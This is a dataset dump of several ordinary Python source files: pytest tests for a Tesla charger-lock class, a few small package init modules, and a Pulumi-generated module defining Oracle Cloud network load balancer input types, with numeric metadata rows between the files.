] | null | null | null | """Test charger lock."""
import pytest
from tests.tesla_mock import TeslaMock
from teslajsonpy.controller import Controller
from teslajsonpy.lock import ChargerLock
def test_has_battery(monkeypatch):
"""Test has_battery()."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_lock = ChargerLock(_data, _controller)
assert not _lock.has_battery()
def test_is_locked_on_init(monkeypatch):
"""Test is_locked() after initialization."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_lock = ChargerLock(_data, _controller)
assert _lock is not None
assert not _lock.is_locked()
@pytest.mark.asyncio
async def test_is_locked_after_update(monkeypatch):
"""Test is_locked() after an update."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
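# ChargerLock reports "locked" when the charge port door is open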
_data["charge_state"]["charge_port_door_open"] = True
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
assert _lock is not None
assert _lock.is_locked()
@pytest.mark.asyncio
async def test_lock(monkeypatch):
"""Test lock()."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = False
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.lock()
assert _lock is not None
assert _lock.is_locked()
@pytest.mark.asyncio
async def test_lock_already_locked(monkeypatch):
"""Test lock() when already locked."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = True
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.lock()
assert _lock is not None
assert _lock.is_locked()
@pytest.mark.asyncio
async def test_unlock(monkeypatch):
"""Test unlock()."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = True
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.unlock()
assert _lock is not None
assert not _lock.is_locked()
@pytest.mark.asyncio
async def test_unlock_already_unlocked(monkeypatch):
"""Test unlock() when already unlocked."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = False
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.unlock()
assert _lock is not None
assert not _lock.is_locked()
| 23.552846 | 58 | 0.713842 | 347 | 2,897 | 5.544669 | 0.132565 | 0.037422 | 0.067568 | 0.070166 | 0.794699 | 0.765593 | 0.765593 | 0.765593 | 0.765593 | 0.765593 | 0 | 0 | 0.182603 | 2,897 | 122 | 59 | 23.745902 | 0.8125 | 0.026579 | 0 | 0.830986 | 0 | 0 | 0.062335 | 0.039668 | 0 | 0 | 0 | 0 | 0.183099 | 1 | 0.028169 | false | 0 | 0.056338 | 0 | 0.084507 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c4cdc8f79352577dbc78afdb200c245ea17167f | 91 | py | Python | backend/beedare/landing/__init__.py | gijs3ntius/BeeDare | 9ad5a93dad9b531b332aeb58f9b97e98585bc1ac | [
"Apache-2.0"
] | 5 | 2018-07-12T11:59:17.000Z | 2021-11-17T19:01:15.000Z | backend/beedare/landing/__init__.py | gijs3ntius/BeeDare | 9ad5a93dad9b531b332aeb58f9b97e98585bc1ac | [
"Apache-2.0"
] | 17 | 2020-06-05T18:27:11.000Z | 2022-03-11T23:24:50.000Z | backend/beedare/landing/__init__.py | gijsentius/BeeDare | 9ad5a93dad9b531b332aeb58f9b97e98585bc1ac | [
"Apache-2.0"
] | 1 | 2020-02-25T13:57:47.000Z | 2020-02-25T13:57:47.000Z | from flask import Blueprint
landing = Blueprint('landing', __name__)
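# import views after the blueprint exists so its route decorators can attach to it
# (the usual Flask pattern, which also sidesteps a circular import)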
from . import views
| 15.166667 | 40 | 0.769231 | 11 | 91 | 6 | 0.636364 | 0.484848 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 91 | 5 | 41 | 18.2 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
4c6a3595e39a5cafbfb0cff0963a9abb789505dc | 168 | py | Python | lib/JumpScale/lib/lxc/__init__.py | jumpscale7/jumpscale_core7 | c3115656214cab1bd32f7a1e092c0bffc84a00cd | [
"Apache-2.0"
] | null | null | null | lib/JumpScale/lib/lxc/__init__.py | jumpscale7/jumpscale_core7 | c3115656214cab1bd32f7a1e092c0bffc84a00cd | [
"Apache-2.0"
] | 4 | 2016-08-25T12:08:39.000Z | 2018-04-12T12:36:01.000Z | lib/JumpScale/lib/lxc/__init__.py | jumpscale7/jumpscale_core7 | c3115656214cab1bd32f7a1e092c0bffc84a00cd | [
"Apache-2.0"
] | 3 | 2016-03-08T07:49:34.000Z | 2018-10-19T13:56:43.000Z | from JumpScale import j
def cb():
from .Lxc import Lxc
return Lxc()
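# register the factory with the JumpScale loader so 'lxc' is resolved via cb when requested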
j.base.loader.makeAvailable(j, 'system.platform')
j.system.platform._register('lxc', cb)
| 16.8 | 49 | 0.702381 | 25 | 168 | 4.68 | 0.56 | 0.119658 | 0.25641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160714 | 168 | 9 | 50 | 18.666667 | 0.829787 | 0 | 0 | 0 | 0 | 0 | 0.107784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5b718bbea896387139a74673f7566c21db91a29 | 49 | py | Python | Chapter-4A/charter/__init__.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | [
"MIT"
] | null | null | null | Chapter-4A/charter/__init__.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | [
"MIT"
] | null | null | null | Chapter-4A/charter/__init__.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | [
"MIT"
] | null | null | null | from .chart import *
from .generator import * | 24.5 | 24 | 0.693878 | 6 | 49 | 5.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.22449 | 49 | 2 | 25 | 24.5 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
912b7c31de01e9cb509c06493f6dc00c09f87ec0 | 26,969 | py | Python | sdk/python/pulumi_oci/networkloadbalancer/_inputs.py | EladGabay/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2021-08-17T11:14:46.000Z | 2021-12-31T02:07:03.000Z | sdk/python/pulumi_oci/networkloadbalancer/_inputs.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-09-06T11:21:29.000Z | 2021-09-06T11:21:29.000Z | sdk/python/pulumi_oci/networkloadbalancer/_inputs.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-08-24T23:31:30.000Z | 2022-01-02T19:26:54.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'BackendSetBackendArgs',
'BackendSetHealthCheckerArgs',
'NetworkLoadBalancerIpAddressArgs',
'NetworkLoadBalancerIpAddressReservedIpArgs',
'NetworkLoadBalancerReservedIpArgs',
'GetBackendSetsFilterArgs',
'GetBackendsFilterArgs',
'GetListenersFilterArgs',
'GetNetworkLoadBalancersFilterArgs',
'GetNetworkLoadBalancersPoliciesFilterArgs',
'GetNetworkLoadBalancersProtocolsFilterArgs',
]
@pulumi.input_type
class BackendSetBackendArgs:
def __init__(__self__, *,
port: pulumi.Input[int],
ip_address: Optional[pulumi.Input[str]] = None,
is_backup: Optional[pulumi.Input[bool]] = None,
is_drain: Optional[pulumi.Input[bool]] = None,
is_offline: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
target_id: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] port: (Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
:param pulumi.Input[str] ip_address: The IP address of the backend server. Example: `10.0.0.3`
:param pulumi.Input[bool] is_backup: Whether the network load balancer should treat this server as a backup unit. If `true`, then the network load balancer forwards no ingress traffic to this backend server unless all other backend servers not marked as "isBackup" fail the health check policy. Example: `false`
:param pulumi.Input[bool] is_drain: Whether the network load balancer should drain this server. Servers marked "isDrain" receive no incoming traffic. Example: `false`
:param pulumi.Input[bool] is_offline: Whether the network load balancer should treat this server as offline. Offline servers receive no incoming traffic. Example: `false`
:param pulumi.Input[str] name: A user-friendly name for the backend set that must be unique and cannot be changed.
:param pulumi.Input[str] target_id: The IP OCID/Instance OCID associated with the backend server. Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
:param pulumi.Input[int] weight: The network load balancing policy weight assigned to the server. Backend servers with a higher weight receive a larger proportion of incoming traffic. For example, a server weighted '3' receives three times the number of new connections as a server weighted '1'. For more information about load balancing policies, see [How Network Load Balancing Policies Work](https://docs.cloud.oracle.com/iaas/Content/Balance/Reference/lbpolicies.htm). Example: `3`
"""
pulumi.set(__self__, "port", port)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_backup is not None:
pulumi.set(__self__, "is_backup", is_backup)
if is_drain is not None:
pulumi.set(__self__, "is_drain", is_drain)
if is_offline is not None:
pulumi.set(__self__, "is_offline", is_offline)
if name is not None:
pulumi.set(__self__, "name", name)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
(Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address of the backend server. Example: `10.0.0.3`
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isBackup")
def is_backup(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the network load balancer should treat this server as a backup unit. If `true`, then the network load balancer forwards no ingress traffic to this backend server unless all other backend servers not marked as "isBackup" fail the health check policy. Example: `false`
"""
return pulumi.get(self, "is_backup")
@is_backup.setter
def is_backup(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_backup", value)
@property
@pulumi.getter(name="isDrain")
def is_drain(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the network load balancer should drain this server. Servers marked "isDrain" receive no incoming traffic. Example: `false`
"""
return pulumi.get(self, "is_drain")
@is_drain.setter
def is_drain(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_drain", value)
@property
@pulumi.getter(name="isOffline")
def is_offline(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the network load balancer should treat this server as offline. Offline servers receive no incoming traffic. Example: `false`
"""
return pulumi.get(self, "is_offline")
@is_offline.setter
def is_offline(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_offline", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A user-friendly name for the backend set that must be unique and cannot be changed.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
"""
The IP OCID/Instance OCID associated with the backend server. Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
"""
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
The network load balancing policy weight assigned to the server. Backend servers with a higher weight receive a larger proportion of incoming traffic. For example, a server weighted '3' receives three times the number of new connections as a server weighted '1'. For more information about load balancing policies, see [How Network Load Balancing Policies Work](https://docs.cloud.oracle.com/iaas/Content/Balance/Reference/lbpolicies.htm). Example: `3`
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
@pulumi.input_type
class BackendSetHealthCheckerArgs:
def __init__(__self__, *,
protocol: pulumi.Input[str],
interval_in_millis: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
request_data: Optional[pulumi.Input[str]] = None,
response_body_regex: Optional[pulumi.Input[str]] = None,
response_data: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
return_code: Optional[pulumi.Input[int]] = None,
timeout_in_millis: Optional[pulumi.Input[int]] = None,
url_path: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] protocol: (Updatable) The protocol the health check must use; either HTTP or HTTPS, or UDP or TCP. Example: `HTTP`
:param pulumi.Input[int] interval_in_millis: (Updatable) The interval between health checks, in milliseconds. The default value is 10000 (10 seconds). Example: `10000`
:param pulumi.Input[int] port: (Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
:param pulumi.Input[str] request_data: (Updatable) Base64 encoded pattern to be sent as UDP or TCP health check probe.
:param pulumi.Input[str] response_body_regex: (Updatable) A regular expression for parsing the response body from the backend server. Example: `^((?!false).|\s)*$`
:param pulumi.Input[str] response_data: (Updatable) Base64 encoded pattern to be validated as UDP or TCP health check probe response.
:param pulumi.Input[int] retries: (Updatable) The number of retries to attempt before a backend server is considered "unhealthy". This number also applies when recovering a server to the "healthy" state. The default value is 3. Example: `3`
:param pulumi.Input[int] return_code: (Updatable) The status code a healthy backend server should return. If you configure the health check policy to use the HTTP protocol, then you can use common HTTP status codes such as "200". Example: `200`
:param pulumi.Input[int] timeout_in_millis: (Updatable) The maximum time, in milliseconds, to wait for a reply to a health check. A health check is successful only if a reply returns within this timeout period. The default value is 3000 (3 seconds). Example: `3000`
:param pulumi.Input[str] url_path: (Updatable) The path against which to run the health check. Example: `/healthcheck`
"""
pulumi.set(__self__, "protocol", protocol)
if interval_in_millis is not None:
pulumi.set(__self__, "interval_in_millis", interval_in_millis)
if port is not None:
pulumi.set(__self__, "port", port)
if request_data is not None:
pulumi.set(__self__, "request_data", request_data)
if response_body_regex is not None:
pulumi.set(__self__, "response_body_regex", response_body_regex)
if response_data is not None:
pulumi.set(__self__, "response_data", response_data)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if return_code is not None:
pulumi.set(__self__, "return_code", return_code)
if timeout_in_millis is not None:
pulumi.set(__self__, "timeout_in_millis", timeout_in_millis)
if url_path is not None:
pulumi.set(__self__, "url_path", url_path)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
"""
(Updatable) The protocol the health check must use; either HTTP or HTTPS, or UDP or TCP. Example: `HTTP`
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="intervalInMillis")
def interval_in_millis(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The interval between health checks, in milliseconds. The default value is 10000 (10 seconds). Example: `10000`
"""
return pulumi.get(self, "interval_in_millis")
@interval_in_millis.setter
def interval_in_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval_in_millis", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="requestData")
def request_data(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Base64 encoded pattern to be sent as UDP or TCP health check probe.
"""
return pulumi.get(self, "request_data")
@request_data.setter
def request_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_data", value)
@property
@pulumi.getter(name="responseBodyRegex")
def response_body_regex(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A regular expression for parsing the response body from the backend server. Example: `^((?!false).|\s)*$`
"""
return pulumi.get(self, "response_body_regex")
@response_body_regex.setter
def response_body_regex(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response_body_regex", value)
@property
@pulumi.getter(name="responseData")
def response_data(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Base64 encoded pattern to be validated as UDP or TCP health check probe response.
"""
return pulumi.get(self, "response_data")
@response_data.setter
def response_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response_data", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The number of retries to attempt before a backend server is considered "unhealthy". This number also applies when recovering a server to the "healthy" state. The default value is 3. Example: `3`
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="returnCode")
def return_code(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The status code a healthy backend server should return. If you configure the health check policy to use the HTTP protocol, then you can use common HTTP status codes such as "200". Example: `200`
"""
return pulumi.get(self, "return_code")
@return_code.setter
def return_code(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "return_code", value)
@property
@pulumi.getter(name="timeoutInMillis")
def timeout_in_millis(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The maximum time, in milliseconds, to wait for a reply to a health check. A health check is successful only if a reply returns within this timeout period. The default value is 3000 (3 seconds). Example: `3000`
"""
return pulumi.get(self, "timeout_in_millis")
@timeout_in_millis.setter
def timeout_in_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_in_millis", value)
@property
@pulumi.getter(name="urlPath")
def url_path(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The path against which to run the health check. Example: `/healthcheck`
"""
return pulumi.get(self, "url_path")
@url_path.setter
def url_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_path", value)
@pulumi.input_type
class NetworkLoadBalancerIpAddressArgs:
def __init__(__self__, *,
ip_address: Optional[pulumi.Input[str]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
reserved_ip: Optional[pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs']] = None):
"""
:param pulumi.Input[str] ip_address: An IP address. Example: `192.168.0.3`
:param pulumi.Input[bool] is_public: Whether the IP address is public or private.
:param pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs'] reserved_ip: An object representing a reserved IP address to be attached or that is already attached to a network load balancer.
"""
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if reserved_ip is not None:
pulumi.set(__self__, "reserved_ip", reserved_ip)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
An IP address. Example: `192.168.0.3`
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the IP address is public or private.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="reservedIp")
def reserved_ip(self) -> Optional[pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs']]:
"""
An object representing a reserved IP address to be attached or that is already attached to a network load balancer.
"""
return pulumi.get(self, "reserved_ip")
@reserved_ip.setter
def reserved_ip(self, value: Optional[pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs']]):
pulumi.set(self, "reserved_ip", value)
@pulumi.input_type
class NetworkLoadBalancerIpAddressReservedIpArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: OCID of the reserved public IP address created with the virtual cloud network.
"""
if id is not None:
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
OCID of the reserved public IP address created with the virtual cloud network.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@pulumi.input_type
class NetworkLoadBalancerReservedIpArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: OCID of the reserved public IP address created with the virtual cloud network.
"""
if id is not None:
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
OCID of the reserved public IP address created with the virtual cloud network.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@pulumi.input_type
class GetBackendSetsFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
"""
:param str name: A user-friendly name for the backend set that must be unique and cannot be changed.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
"""
A user-friendly name for the backend set that must be unique and cannot be changed.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetBackendsFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
"""
:param str name: A read-only field showing the IP address/IP OCID and port that uniquely identify this backend server in the backend set. Example: `10.0.0.3:8080`, or `ocid1.privateip..oc1.<var><unique_ID></var>:443` or `10.0.0.3:0`
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
"""
A read-only field showing the IP address/IP OCID and port that uniquely identify this backend server in the backend set. Example: `10.0.0.3:8080`, or `ocid1.privateip..oc1.<var><unique_ID></var>:443` or `10.0.0.3:0`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetListenersFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
"""
:param str name: A friendly name for the listener. It must be unique and it cannot be changed. Example: `example_listener`
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
"""
A friendly name for the listener. It must be unique and it cannot be changed. Example: `example_listener`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetNetworkLoadBalancersFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetNetworkLoadBalancersPoliciesFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetNetworkLoadBalancersProtocolsFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
| 39.777286 | 494 | 0.646112 | 3,403 | 26,969 | 4.98707 | 0.079636 | 0.066761 | 0.062813 | 0.045902 | 0.849862 | 0.774144 | 0.733133 | 0.692063 | 0.676978 | 0.653821 | 0 | 0.007978 | 0.242389 | 26,969 | 677 | 495 | 39.836041 | 0.822631 | 0.322741 | 0 | 0.597315 | 1 | 0 | 0.087862 | 0.026768 | 0 | 0 | 0 | 0 | 0 | 1 | 0.208054 | false | 0 | 0.011186 | 0.033557 | 0.33557 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6a02049e1e7e3f9f9f270de2a17c0dc10dcbbd2 | 47 | py | Python | rmipipeline/__init__.py | mri-group-opbg/mri-pipelines | 0bc23e04717b6f92b8c270d9d44cd65e7f9f538c | [
"Apache-2.0"
] | null | null | null | rmipipeline/__init__.py | mri-group-opbg/mri-pipelines | 0bc23e04717b6f92b8c270d9d44cd65e7f9f538c | [
"Apache-2.0"
] | null | null | null | rmipipeline/__init__.py | mri-group-opbg/mri-pipelines | 0bc23e04717b6f92b8c270d9d44cd65e7f9f538c | [
"Apache-2.0"
] | null | null | null | from .tasks import *
from .kubernetes import *
